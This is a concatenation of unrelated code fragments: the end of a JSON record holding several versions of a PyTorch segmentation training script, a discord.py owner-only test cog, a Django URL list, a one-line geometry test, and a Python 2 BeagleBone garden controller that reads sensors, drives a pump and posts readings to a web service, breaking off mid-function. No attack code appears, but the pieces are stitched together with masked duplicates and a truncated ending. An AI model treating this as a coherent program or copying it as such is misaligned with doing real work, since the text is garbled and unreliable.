os.path.join(args.model_path,\n f\"{'seg'}_{args.seg_model}_{args.seg_backend}_{epoch}.pth\"))\n print(f'epoch:{epoch} total_loss: {total_loss / len(traindata)}')\n\n\nif __name__ == '__main__':\n train()\n",
"step-4": "__author__ = 'BeiYu'\nfrom utils.init_env import set_seed\nfrom utils.options import *\nimport os\nimport logging\nimport torch\nfrom torch import nn\nfrom torch import optim\nfrom torch.optim.lr_scheduler import MultiStepLR\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom modules.seg_dataset import *\nfrom tqdm import tqdm\nimport click\nimport torch.nn.functional as F\nimport numpy as np\nfrom modules.seg import PSPNet\nmodels = {'squeezenet': lambda : PSPNet(sizes=(1, 2, 3, 6), psp_size=512,\n deep_features_size=256, backend='squeezenet', n_classes=3), 'densenet':\n lambda : PSPNet(sizes=(1, 2, 3, 6), psp_size=1024, deep_features_size=\n 512, backend='densenet', n_classes=3), 'resnet18': lambda : PSPNet(\n sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend=\n 'resnet18', n_classes=3), 'resnet34': lambda : PSPNet(sizes=(1, 2, 3, 6\n ), psp_size=512, deep_features_size=256, backend='resnet34', n_classes=\n 3), 'resnet50': lambda : PSPNet(sizes=(1, 2, 3, 6), psp_size=2048,\n deep_features_size=1024, backend='resnet50', n_classes=3), 'resnet101':\n lambda : PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=\n 1024, backend='resnet101', n_classes=3), 'resnet152': lambda : PSPNet(\n sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend=\n 'resnet152', n_classes=3)}\n\n\ndef build_network(snapshot, backend):\n epoch = 0\n backend = backend.lower()\n net = models[backend]()\n if snapshot is not None:\n _, epoch = os.path.basename(snapshot).split('_')\n epoch = int(epoch)\n net.load_state_dict(torch.load(snapshot))\n logging.info('Snapshot for epoch {} loaded from {}'.format(epoch,\n snapshot))\n net = net.cuda(0)\n return net, epoch\n\n\ndef train():\n args = get_args()\n os.makedirs(args.model_path, exist_ok=True)\n set_seed(args.seed)\n \"\"\"\n To follow this training routine you need a DataLoader that yields the tuples of the following format:\n (Bx3xHxW FloatTensor x, BxHxW LongTensor y, BxN LongTensor y_cls) where\n x - batch of input images,\n y - batch of groung truth seg maps,\n y_cls - batch of 1D tensors of dimensionality N: N total number of classes, \n y_cls[i, T] = 1 if class T is present in image i, 0 otherwise\n \"\"\"\n traindata = HeadSegData(args.seg_data_path, args.train_txt, train=True)\n train_loader = DataLoader(traindata, batch_size=args.seg_batch_size,\n shuffle=True, num_workers=1)\n net, _ = build_network(None, args.seg_backend)\n seg_criterion = nn.NLLLoss().cuda(0)\n cls_criterion = nn.BCEWithLogitsLoss().cuda(0)\n optimizer = optim.Adam(net.parameters(), lr=args.seg_lr)\n print('start training...')\n net.train()\n total_loss = 0.0\n for epoch in range(args.seg_epochs):\n if (epoch + 1) % 5 == 0:\n for group in optimizer.param_groups:\n group['lr'] *= 0.25\n total_loss = 0.0\n for i, (x, y, y_cls) in enumerate(train_loader):\n x, y, y_cls = x.cuda(0), y.cuda(0).long(), y_cls.cuda(0).float()\n out, out_cls = net(x)\n seg_loss = seg_criterion(out, y)\n cls_loss = cls_criterion(out_cls, y_cls)\n loss = seg_loss + args.seg_alpha * cls_loss\n total_loss += loss.item()\n if i % 50 == 0:\n status = '[batch:{0}/{1} epoch:{2}] loss = {3:0.5f}'.format(i,\n len(traindata) // args.seg_batch_size, epoch + 1, loss.\n item())\n print(status)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n torch.save(net.state_dict(), os.path.join(args.model_path,\n f\"{'seg'}_{args.seg_model}_{args.seg_backend}_{epoch}.pth\"))\n print(f'epoch:{epoch} total_loss: {total_loss / 
len(traindata)}')\n\n\nif __name__ == '__main__':\n train()\n",
"step-5": "# Author: BeiYu\n# Github: https://github.com/beiyuouo\n# Date : 2021/2/21 21:57\n# Description:\n\n__author__ = \"BeiYu\"\n\nfrom utils.init_env import set_seed\nfrom utils.options import *\n\nimport os\nimport logging\nimport torch\nfrom torch import nn\nfrom torch import optim\nfrom torch.optim.lr_scheduler import MultiStepLR\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom modules.seg_dataset import *\nfrom tqdm import tqdm\nimport click\nimport torch.nn.functional as F\nimport numpy as np\nfrom modules.seg import PSPNet\n\nmodels = {\n 'squeezenet': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='squeezenet', n_classes=3),\n 'densenet': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=1024, deep_features_size=512, backend='densenet', n_classes=3),\n 'resnet18': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='resnet18', n_classes=3),\n 'resnet34': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='resnet34', n_classes=3),\n 'resnet50': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet50', n_classes=3),\n 'resnet101': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet101', n_classes=3),\n 'resnet152': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet152', n_classes=3)\n}\n\n\ndef build_network(snapshot, backend):\n epoch = 0\n backend = backend.lower()\n net = models[backend]()\n # net = nn.DataParallel(net)\n if snapshot is not None:\n _, epoch = os.path.basename(snapshot).split('_')\n epoch = int(epoch)\n net.load_state_dict(torch.load(snapshot))\n logging.info(\"Snapshot for epoch {} loaded from {}\".format(epoch, snapshot))\n net = net.cuda(0)\n return net, epoch\n\n\ndef train():\n args = get_args()\n # os.environ[\"CUDA_VISIBLE_DEVICES\"] = gpu\n # net, starting_epoch = build_network(snapshot, backend)\n # data_path = os.path.abspath(os.path.expanduser(data_path))\n # models_path = os.path.abspath(os.path.expanduser(models_path))\n os.makedirs(args.model_path, exist_ok=True)\n set_seed(args.seed)\n\n '''\n To follow this training routine you need a DataLoader that yields the tuples of the following format:\n (Bx3xHxW FloatTensor x, BxHxW LongTensor y, BxN LongTensor y_cls) where\n x - batch of input images,\n y - batch of groung truth seg maps,\n y_cls - batch of 1D tensors of dimensionality N: N total number of classes, \n y_cls[i, T] = 1 if class T is present in image i, 0 otherwise\n '''\n traindata = HeadSegData(args.seg_data_path, args.train_txt, train=True)\n train_loader = DataLoader(traindata, batch_size=args.seg_batch_size, shuffle=True, num_workers=1)\n\n net, _ = build_network(None, args.seg_backend)\n seg_criterion = nn.NLLLoss().cuda(0)\n cls_criterion = nn.BCEWithLogitsLoss().cuda(0)\n optimizer = optim.Adam(net.parameters(), lr=args.seg_lr)\n # scheduler = MultiStepLR(optimizer, milestones=[int(x) for x in milestones.split(',')])\n\n print(\"start training...\")\n net.train()\n total_loss = 0.0\n for epoch in range(args.seg_epochs):\n if (epoch+1) % 5 == 0:\n for group in optimizer.param_groups:\n group['lr'] *= 0.25\n total_loss = 0.0\n for i, (x, y, y_cls) in enumerate(train_loader):\n x, y, y_cls = x.cuda(0), y.cuda(0).long(), y_cls.cuda(0).float()\n\n out, out_cls = net(x)\n # print(x.shape, out.shape, out_cls.shape, y.shape, y_cls.shape)\n seg_loss = seg_criterion(out, y)\n cls_loss = 
cls_criterion(out_cls, y_cls)\n loss = seg_loss + args.seg_alpha * cls_loss\n total_loss += loss.item()\n\n if i % 50 == 0:\n status = '[batch:{0}/{1} epoch:{2}] loss = {3:0.5f}'.format(i, len(traindata) // args.seg_batch_size,\n epoch + 1,\n loss.item())\n print(status)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n torch.save(net.state_dict(), os.path.join(args.model_path,\n f'{\"seg\"}_{args.seg_model}_{args.seg_backend}_{epoch}.pth'))\n print(f'epoch:{epoch} total_loss: {total_loss / len(traindata)}')\n\n\nif __name__ == '__main__':\n train()\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
import discord
from discord.ext import commands
class TestCommands(commands.Cog, description="Unstable test commands", command_attrs=dict(hidden=True, description="Can only be used by an Owner")):
def __init__(self, bot):
self.bot = bot
self.hidden = True
print("Loaded", __name__)
async def cog_check(self, ctx):
return await self.bot.is_owner(ctx.author)
def setup(bot):
if getattr(bot, "debug", False):
bot.add_cog(TestCommands(bot))
|
normal
|
{
"blob_id": "d5a5c6f9d483b2998cd0d9e47b37ab4499fa1c2a",
"index": 6279,
"step-1": "<mask token>\n\n\nclass TestCommands(commands.Cog, description='Unstable test commands',\n command_attrs=dict(hidden=True, description='Can only be used by an Owner')\n ):\n <mask token>\n\n async def cog_check(self, ctx):\n return await self.bot.is_owner(ctx.author)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestCommands(commands.Cog, description='Unstable test commands',\n command_attrs=dict(hidden=True, description='Can only be used by an Owner')\n ):\n\n def __init__(self, bot):\n self.bot = bot\n self.hidden = True\n print('Loaded', __name__)\n\n async def cog_check(self, ctx):\n return await self.bot.is_owner(ctx.author)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestCommands(commands.Cog, description='Unstable test commands',\n command_attrs=dict(hidden=True, description='Can only be used by an Owner')\n ):\n\n def __init__(self, bot):\n self.bot = bot\n self.hidden = True\n print('Loaded', __name__)\n\n async def cog_check(self, ctx):\n return await self.bot.is_owner(ctx.author)\n\n\ndef setup(bot):\n if getattr(bot, 'debug', False):\n bot.add_cog(TestCommands(bot))\n",
"step-4": "import discord\nfrom discord.ext import commands\n\n\nclass TestCommands(commands.Cog, description='Unstable test commands',\n command_attrs=dict(hidden=True, description='Can only be used by an Owner')\n ):\n\n def __init__(self, bot):\n self.bot = bot\n self.hidden = True\n print('Loaded', __name__)\n\n async def cog_check(self, ctx):\n return await self.bot.is_owner(ctx.author)\n\n\ndef setup(bot):\n if getattr(bot, 'debug', False):\n bot.add_cog(TestCommands(bot))\n",
"step-5": "import discord\nfrom discord.ext import commands\n\n\nclass TestCommands(commands.Cog, description=\"Unstable test commands\", command_attrs=dict(hidden=True, description=\"Can only be used by an Owner\")):\n def __init__(self, bot):\n self.bot = bot\n self.hidden = True\n print(\"Loaded\", __name__)\n\n\n async def cog_check(self, ctx):\n return await self.bot.is_owner(ctx.author)\n\n\ndef setup(bot):\n if getattr(bot, \"debug\", False):\n bot.add_cog(TestCommands(bot))\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from django.urls import path,include
from Income import views
urlpatterns = [
path('IncomeHome/',views.IncomeHome,name='IncomeHome'),
path('IncomeCreate/',views.IncomeCreate.as_view(),name='IncomeCreate'),
path('IncomeUpdate/<int:pk>',views.IncomeUpdate.as_view(),name='IncomeUpdate'),
path('IncomeDelete/<int:pk>',views.IncomeDelete.as_view(),name='IncomeDelete'),
path('Income/',views.IncomeView.as_view(),name='Income'),
]
|
normal
|
{
"blob_id": "ad3a7221883a847fc9d26097c3801973cbbda38e",
"index": 355,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('IncomeHome/', views.IncomeHome, name='IncomeHome'),\n path('IncomeCreate/', views.IncomeCreate.as_view(), name='IncomeCreate'\n ), path('IncomeUpdate/<int:pk>', views.IncomeUpdate.as_view(), name=\n 'IncomeUpdate'), path('IncomeDelete/<int:pk>', views.IncomeDelete.\n as_view(), name='IncomeDelete'), path('Income/', views.IncomeView.\n as_view(), name='Income')]\n",
"step-3": "from django.urls import path, include\nfrom Income import views\nurlpatterns = [path('IncomeHome/', views.IncomeHome, name='IncomeHome'),\n path('IncomeCreate/', views.IncomeCreate.as_view(), name='IncomeCreate'\n ), path('IncomeUpdate/<int:pk>', views.IncomeUpdate.as_view(), name=\n 'IncomeUpdate'), path('IncomeDelete/<int:pk>', views.IncomeDelete.\n as_view(), name='IncomeDelete'), path('Income/', views.IncomeView.\n as_view(), name='Income')]\n",
"step-4": "\nfrom django.urls import path,include\n\nfrom Income import views\n\nurlpatterns = [\n path('IncomeHome/',views.IncomeHome,name='IncomeHome'),\n path('IncomeCreate/',views.IncomeCreate.as_view(),name='IncomeCreate'),\n path('IncomeUpdate/<int:pk>',views.IncomeUpdate.as_view(),name='IncomeUpdate'),\n path('IncomeDelete/<int:pk>',views.IncomeDelete.as_view(),name='IncomeDelete'),\n path('Income/',views.IncomeView.as_view(),name='Income'),\n\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
__author__ = 'jjpr'
import pyrr
import barleycorn as bc
def test_xyz123():
cone_x = bc.primitives.Cone(1.0, 1.0)
|
normal
|
{
"blob_id": "e6af221f1d6397d0fc52671cdd27d43549d0aecb",
"index": 513,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_xyz123():\n cone_x = bc.primitives.Cone(1.0, 1.0)\n",
"step-3": "__author__ = 'jjpr'\n<mask token>\n\n\ndef test_xyz123():\n cone_x = bc.primitives.Cone(1.0, 1.0)\n",
"step-4": "__author__ = 'jjpr'\nimport pyrr\nimport barleycorn as bc\n\n\ndef test_xyz123():\n cone_x = bc.primitives.Cone(1.0, 1.0)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# jan 2014 bbb garden shield attempt
# AKA
'''
Sensors:
analog level sensor, pin AIN0
TMP102 i2c temperature sensor, address 0x48
(if add0 is grounded) or 0x49 (if pulled up)
Outputs:
Analog RGB LED strip
I2C display(?)
Pump Activate/Deactivate (GPIO pin)
Some measurements as of mid-March 2014:
Tank can be pumped for 15 minutes without sun exposure to liquid.
Seems like after 10 minutes of pumping, the autosiphon engages, though.
Tank takes about 17 minutes to drain from a 15-minute pump
11 gals in reservoir reads as 0.42 on the adc.read scale from 0 to 1
8 gals in reservoir reads as 0.175 on the adc.read scale from 0 to 1
7 gals in reservoir reads as 0.15 on the adc.read scale from 0 to 1
'''
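# Illustrative sketch only (not part of the original controller): the reservoir
# calibration points above (0.15 -> 7 gal, 0.175 -> 8 gal, 0.42 -> 11 gal) suggest
# a rough piecewise-linear mapping from the adc.read() value to gallons, e.g.:
#
#   def approx_gallons(reading):  # hypothetical helper, assumes linearity between points
#       if reading <= 0.175:
#           return 7.0 + (reading - 0.15) * (8.0 - 7.0) / (0.175 - 0.15)
#       return 8.0 + (reading - 0.175) * (11.0 - 8.0) / (0.42 - 0.175)
#
# so approx_gallons(0.30) comes out to roughly 9.5 gallons.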
from __future__ import division
import Adafruit_SSD1306 as ssd
import Adafruit_BBIO.UART as uart
import Image
import ImageDraw
import ImageFont
# import Adafruit_GPIO.PWM as pwm
import Adafruit_BBIO.GPIO as gpio
import Adafruit_BBIO.ADC as adc
# import TMP102 as tmp102
import datetime
from dateutil.tz import tzlocal
import time
import serial
import atexit
from math import log
import requests
import key as k
import logging
BCOEFFICIENT = 3950 # thermistor beta coefficient
THERMISTORNOMINAL = 10000
TEMPERATURENOMINAL = 25.0
SERIESRESISTOR = 10000
# a1 = blue and white, which is bed temp
# a2 = white and orange, which is tank temp
interval = 60 # seconds between samples
greenPin = 'P8_13'
bluePin = 'P9_14'
redPin = 'P8_19'
servoPin = 'P9_16'
tankPin = 'P9_39'
photoPin = 'P9_38'
thermistor1 = 'P9_40' # AIN1, bed temp
thermistor2 = 'P9_37' # AIN2, reservoir temp
pumpPin = 'P8_10'
RST = 'P8_10' # OLED screen reset pin, not always necessary
readings = {}
PUMP_INTERVAL = 60 # minutes between pump actuations
PUMP_DURATION = 12 # minutes to run pump
def exit_handler():
print 'exiting'
gpio.output(pumpPin,gpio.LOW)
gpio.cleanup()
uart.cleanup()
def do_sensor_read():
print 'sensor read'
global readings
readings = {}
# value = ADC.read("AIN1")
# adc returns value from 0 to 1.
# use read_raw(pin) to get V values
# tank = adc.read(tankPin)
tank = adc.read(tankPin) # have to read twice due to bbio bug
print 'tank is %s' % tank
time.sleep(1)
# photo = adc.read(photoPin) # have to read twice due to bbio bug
photo = 1.0-adc.read(photoPin) # reverse range so that 0 is darkest
print 'photo is %s' % photo
time.sleep(1)
# temp1 = adc.read_raw(thermistor1)
temp1 = adc.read_raw(thermistor1)
time.sleep(1)
print 'temp1 raw %s' % temp1
temp1 = convert_thermistor_special(temp1)
readings['bedTemp'] = temp1
print 'converted bed_temp is %s' % temp1
# # do conversion per
# # http://learn.adafruit.com/thermistor/using-a-thermistor
# temp2 = adc.read_raw(thermistor2)
temp2 = adc.read_raw(thermistor2)
time.sleep(1)
print 'temp2 raw %s' % temp2
print temp2
temp2 = convert_thermistor(temp2)
readings['tankTemp'] = temp2
print 'converted reservoir_temp is %s' % temp2
# do conversion per
# http://learn.adafruit.com/thermistor/using-a-thermistor
# tmp36reading = adc.read_raw(tmp36Pin)
# tmp36reading = adc.read_raw(tmp36Pin) # have to read twice due to bbio bug
# millivolts = tmp36reading * 1800 # 1.8V reference = 1800 mV
# temp_c = (millivolts - 500) / 10
# print temp_c
# ph_val = get_ph()
# print 'ph_val was thoght to be %s' % ph_val
readings['tankLevel'] = tank # tank level
readings['photocell'] = photo # photocell
def convert_thermistor(raw):
# convert the value to resistance
# print 'was given %s' % raw
raw = SERIESRESISTOR/((1800.0/raw) - 1.0)
# raw = float(SERIESRESISTOR / float(raw))
print 'Thermistor resistance '
print raw
steinhart = raw/THERMISTORNOMINAL # (R/Ro)
steinhart = log(steinhart) # ln(R/Ro)
steinhart /= BCOEFFICIENT # 1/B * ln(R/Ro)
steinhart += float(1.0 / (TEMPERATURENOMINAL + 273.15)) # + (1/To)
steinhart = float(1.0 / steinhart) # Invert
steinhart -= 273.15 # convert to C
print 'we think converted temperature is %s' % steinhart
return steinhart
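# Worked check (illustrative, not in the original code): a raw reading of 900 gives
# R = 10000/((1800.0/900) - 1.0) = 10 kOhm = THERMISTORNOMINAL, so ln(R/Ro) = 0 and
# the Steinhart-Hart chain reduces to 1/(1/(25.0 + 273.15)) - 273.15 = 25.0 C,
# i.e. the nominal temperature, as expected.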
def convert_thermistor_special(raw):
# convert the value to resistance
# print 'was given %s' % raw
# raw = (1800/raw) - 1
# fuck me, a1 is only up against 3.73kOhm - even though it's a properly-labeled resistor!
raw = 3730.0/((1800.0/raw) - 1.0)
print 'Thermistor resistance '
print raw
steinhart = raw/THERMISTORNOMINAL # (R/Ro)
steinhart = log(steinhart) # ln(R/Ro)
steinhart /= BCOEFFICIENT # 1/B * ln(R/Ro)
steinhart += float(1.0 / (TEMPERATURENOMINAL + 273.15)) # + (1/To)
steinhart = float(1.0 / steinhart) # Invert
steinhart -= 273.15 # convert to C
print 'we think converted temperature is %s' % steinhart
return steinhart
def do_db_update():
print 'db update'
global readings
# print readings
if len(readings) != 0:
# data.sparkfun.com is expecting:
# bedTemp, photo, tankLevel, tankTemp
bedTemp = float('{0:.2f}'.format(readings['bedTemp']))
tankTemp = float('{0:.2f}'.format(readings['tankTemp']))
payload = {
'photo':readings['photocell'],
'tankLevel':readings['tankLevel'],
'bedTemp':readings['bedTemp'],
'tankTemp':readings['tankTemp']
}
h = {'Phant-Private-Key':k.key['phant_private']}
r = requests.post(k.key['phant_url'], data=payload, headers=h)
print 'wrote a result set to the DB'
else:
print 'NULL readings, nothing written to DB'
def get_ph():
print 'we are in get_ph'
uart.setup('UART2')
ser = serial.Serial(port = '/dev/ttyO2', baudrate=38400)
print 'opened serial port'
ser.open()
ser.write('R\r')
data = ser.read()
print 'ph received raw as %s' % data
ser.close()
uart.cleanup()
return data
def do_state_display():
print 'state_display'
width = disp.width
height = disp.height
image = Image.new('1', (width, height))
# Get drawing object to draw on image.
draw = ImageDraw.Draw(image)
# Load default font.
# font = ImageFont.load_default()
# Alternatively load a TTF font.
# Some other nice fonts to try: http://www.dafont.com/bitmap.php
font = ImageFont.truetype('Vdj.ttf', 8)
# Draw a black filled box to clear the image.
draw.rectangle((0,0,width,height), outline=0, fill=0)
# Draw some shapes.
# First define some constants to allow easy resizing of shapes.
padding = 2
shape_width = 20
top = padding
bottom = height-padding
# Move left to right keeping track of the current x position for drawing shapes.
x = padding
draw.text((x, top), 'photo: ', font=font, fill=255)
draw.text((x, top+16), 'tankLevel: ', font=font, fill=255)
draw.text((x, top+32), 'tankTemp: ', font=font, fill=255)
draw.text((x, top+48), 'bedTemp: ', font=font, fill=255)
draw.text((x+64, top), str(readings['photocell'])[:4], font=font, fill=255)
draw.text((x+64, top+16), str(readings['tankLevel'])[:4], font=font, fill=255)
draw.text((x+64, top+32), str(readings['tankTemp'])[:4], font=font, fill=255)
draw.text((x+64, top+48), str(readings['bedTemp'])[:4], font=font, fill=255)
# Draw an ellipse.
# draw.ellipse((x, top , x+shape_width, bottom), outline=255, fill=0)
# x += shape_width+padding
# Draw a rectangle.
# draw.rectangle((x, top, x+shape_width, bottom), outline=255, fill=0)
# x += shape_width+padding
# Draw a triangle.
# draw.polygon([(x, bottom), (x+shape_width/2, top), (x+shape_width, bottom)], outline=255, fill=0)
# x += shape_width+padding
# Draw an X.
# draw.line((x, bottom, x+shape_width, top), fill=255)
# draw.line((x, top, x+shape_width, bottom), fill=255)
# x += shape_width+padding
# Display image.
disp.image(image)
disp.display()
# so, what will state display be?
# I2C display of tank temp?
def do_pump_toggle():
print 'pump actuate'
'''
this should actually work like:
if currentMinute mod PUMP_DURATION < PUMP_INTERVAL:
activate pump
else:
turn off pump
'''
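    # Illustrative sketch only (assumes the intended test is minute % PUMP_INTERVAL
    # < PUMP_DURATION): such an interval-based schedule would read roughly as
    #   if datetime.datetime.today().minute % PUMP_INTERVAL < PUMP_DURATION:
    #       gpio.output(pumpPin, gpio.HIGH)
    #   else:
    #       gpio.output(pumpPin, gpio.LOW)
    # which, with PUMP_INTERVAL = 60, matches the "first PUMP_DURATION minutes of
    # each hour" behaviour implemented below.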
if (datetime.datetime.today().hour>6 and datetime.datetime.today().hour<23):
print 'within actuating timeframe'
# changed this to just pump for the first PUMP_DURATION minutes every hour
if(datetime.datetime.today().minute <= PUMP_DURATION):
print 'we are in the first %s minutes of the hour, so pump should be on.' % PUMP_DURATION
gpio.output(pumpPin,gpio.HIGH)
else:
print 'shutting off pump at %s' % datetime.datetime.today().minute
gpio.output(pumpPin,gpio.LOW)
else:
print 'it is the actuator quiet period, between 11pm and 6am'
gpio.output(pumpPin,gpio.LOW)
print 'starting sampling at'
print datetime.datetime.now(tzlocal())
logging.basicConfig(filename='example.log',level=logging.DEBUG)
# adc.setup(thermistor1)
# adc.setup(thermistor2)
# adc.setup(photoPin)
adc.setup()
# uart.setup('UART2')
# print 'uart setup'
gpio.setup(pumpPin,gpio.OUT)
# t = tmp102.TMP102()
disp = ssd.SSD1306_128_64(rst=RST,i2c_address=0x3D)
disp.begin()
disp.clear()
disp.display()
# NOTE
# There is currently a bug in the ADC driver.
# You'll need to read the values twice
# in order to get the latest value.
# pwm.start(greenPin, 10.0, 2000.0)
# pwm.start(redPin, 10.0, 2000.0)
# pwm.start(bluePin, 10.0, 2000.0)
atexit.register(exit_handler)
while True:
try:
do_sensor_read()
except Exception, e:
print e
print 'sensor_read error!'
try:
do_db_update()
except Exception, e:
print e
print 'do_db_update error!'
try:
do_state_display()
# pass
except Exception, e:
print e
print 'do_state_display error!'
try:
do_pump_toggle()
except Exception, e:
print e
print 'do_pump_toggle error!'
print 'done with cycle, now waiting %s' % datetime.datetime.today()
time.sleep(interval)
|
normal
|
{
"blob_id": "06992263599fe3290c87ec00c6cb8af3748920c8",
"index": 5497,
"step-1": "\n#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# jan 2014 bbb garden shield attempt\n# AKA\n\n'''\nSensors:\nanalog level sensor, pin AIN0\nTMP102 i2c temperature sensor, address 0x48\n(if add0 is grounded) or 0x49 (if pulled up)\n\n\nOutputs:\nAnalog RGB LED strip\nI2C display(?)\nPump Activate/Deactivate (GPIO pin)\n\nSome measurements as of mid-March 2014:\n\nTank can be pumped for 15 minutes without sun exposure to liquid.\nSeems like after 10 minutes of pumping, the autosiphon engages, though.\nTank takes about 17 minutes to drain from a 15-minute pump\n\n11 gals in reservoir reads as 0.42 on the adc.read scale from 0 to 1\n8 gals in reservoir reads as 0.175 on the adc.read scale from 0 to 1\n7 gals in reservoir reads as 0.15 on the adc.read scale from 0 to 1\n'''\nfrom __future__ import division\nimport Adafruit_SSD1306 as ssd\nimport Adafruit_BBIO.UART as uart\nimport Image\nimport ImageDraw\nimport ImageFont\n# import Adafruit_GPIO.PWM as pwm\nimport Adafruit_BBIO.GPIO as gpio\nimport Adafruit_BBIO.ADC as adc\n# import TMP102 as tmp102\nimport datetime\nfrom dateutil.tz import tzlocal\nimport time\nimport serial\nimport atexit\nfrom math import log\nimport requests\nimport key as k\nimport logging\n\nBCOEFFICIENT = 3950 # thermistor beta coefficient\nTHERMISTORNOMINAL = 10000\nTEMPERATURENOMINAL = 25.0\nSERIESRESISTOR = 10000\n# a1 = blue and white, which is bed temp\n# a2 = white and orange, which is tank temp\ninterval = 60 # seconds between samples\ngreenPin = 'P8_13'\nbluePin = 'P9_14'\nredPin = 'P8_19'\nservoPin = 'P9_16'\ntankPin = 'P9_39'\nphotoPin = 'P9_38'\nthermistor1 = 'P9_40' # AIN1, bed temp\nthermistor2 = 'P9_37' # AIN2, reservoir temp\npumpPin = 'P8_10'\nRST = 'P8_10' # OLED screen reset pin, not always necessary\nreadings = {}\nPUMP_INTERVAL = 60 # minutes between pump actuations\nPUMP_DURATION = 12 # minutes to run pump\n\ndef exit_handler():\n print 'exiting'\n gpio.output(pumpPin,gpio.LOW)\n gpio.cleanup()\n uart.cleanup()\n\ndef do_sensor_read():\n print 'sensor read'\n global readings\n readings = {}\n # value = ADC.read(\"AIN1\")\n # adc returns value from 0 to 1.\n # use read_raw(pin) to get V values\n # tank = adc.read(tankPin)\n tank = adc.read(tankPin) # have to read twice due to bbio bug\n print 'tank is %s' % tank\n time.sleep(1)\n \n \n # photo = adc.read(photoPin) # have to read twice due to bbio bug\n photo = 1.0-adc.read(photoPin) # reverse range so that 0 is darkest\n print 'photo is %s' % photo\n time.sleep(1)\n \n\n # temp1 = adc.read_raw(thermistor1)\n temp1 = adc.read_raw(thermistor1)\n time.sleep(1)\n print 'temp1 raw %s' % temp1\n temp1 = convert_thermistor_special(temp1)\n readings['bedTemp'] = temp1\n print 'converted bed_temp is %s' % temp1\n \n # # do conversion per\n # # http://learn.adafruit.com/thermistor/using-a-thermistor\n\n # temp2 = adc.read_raw(thermistor2)\n temp2 = adc.read_raw(thermistor2)\n time.sleep(1)\n print 'temp2 raw %s' % temp2\n print temp2\n temp2 = convert_thermistor(temp2)\n readings['tankTemp'] = temp2\n print 'converted reservoir_temp is %s' % temp2\n\n # do conversion per\n # http://learn.adafruit.com/thermistor/using-a-thermistor\n # tmp36reading = adc.read_raw(tmp36Pin)\n # tmp36reading = adc.read_raw(tmp36Pin) # have to read twice due to bbio bug\n # millivolts = tmp36reading * 1800 # 1.8V reference = 1800 mV\n # temp_c = (millivolts - 500) / 10\n # print temp_c\n\n # ph_val = get_ph()\n # print 'ph_val was thoght to be %s' % ph_val\n\n readings['tankLevel'] = tank # tank level\n 
readings['photocell'] = photo # photocell\n\ndef convert_thermistor(raw):\n # convert the value to resistance\n # print 'was given %s' % raw\n raw = SERIESRESISTOR/((1800.0/raw) - 1.0)\n # raw = float(SERIESRESISTOR / float(raw))\n print 'Thermistor resistance ' \n print raw\n steinhart = raw/THERMISTORNOMINAL # (R/Ro)\n steinhart = log(steinhart) # ln(R/Ro)\n steinhart /= BCOEFFICIENT # 1/B * ln(R/Ro)\n steinhart += float(1.0 / (TEMPERATURENOMINAL + 273.15)) # + (1/To)\n steinhart = float(1.0 / steinhart) # Invert\n steinhart -= 273.15 # convert to C\n print 'we think converted temperature is %s' % steinhart\n return steinhart\n\ndef convert_thermistor_special(raw):\n # convert the value to resistance\n # print 'was given %s' % raw\n # raw = (1800/raw) - 1\n # fuck me, a1 is only up against 3.73kOhm - even though it's a properly-labeled resistor!\n raw = 3730.0/((1800.0/raw) - 1.0)\n print 'Thermistor resistance ' \n print raw\n steinhart = raw/THERMISTORNOMINAL # (R/Ro)\n steinhart = log(steinhart) # ln(R/Ro)\n steinhart /= BCOEFFICIENT # 1/B * ln(R/Ro)\n steinhart += float(1.0 / (TEMPERATURENOMINAL + 273.15)) # + (1/To)\n steinhart = float(1.0 / steinhart) # Invert\n steinhart -= 273.15 # convert to C\n print 'we think converted temperature is %s' % steinhart\n return steinhart\n\ndef do_db_update():\n print 'db update'\n global readings\n # print readings\n if len(readings) != 0:\n # data.sparkfun.com is expecting:\n # bedTemp, photo, tankLevel, tankTemp\n bedTemp = float('{0:.2f}'.format(readings['bedTemp']))\n tankTemp = float('{0:.2f}'.format(readings['tankTemp']))\n payload = {\n 'photo':readings['photocell'],\n 'tankLevel':readings['tankLevel'],\n 'bedTemp':readings['bedTemp'],\n 'tankTemp':readings['tankTemp']\n }\n h = {'Phant-Private-Key':k.key['phant_private']}\n r = requests.post(k.key['phant_url'], data=payload, headers=h)\n print 'wrote a result set to the DB'\n else:\n print 'NULL readings, nothing written to DB'\n\ndef get_ph():\n print 'we are in get_ph'\n uart.setup('UART2')\n ser = serial.Serial(port = '/dev/ttyO2', baudrate=38400)\n print 'opened serial port'\n ser.open()\n ser.write('R\\r')\n data = ser.read()\n print 'ph received raw as %s' % data\n ser.close()\n uart.cleanup()\n return data\n\ndef do_state_display():\n print 'state_display'\n width = disp.width\n height = disp.height\n image = Image.new('1', (width, height))\n\n # Get drawing object to draw on image.\n draw = ImageDraw.Draw(image)\n # Load default font.\n # font = ImageFont.load_default()\n # 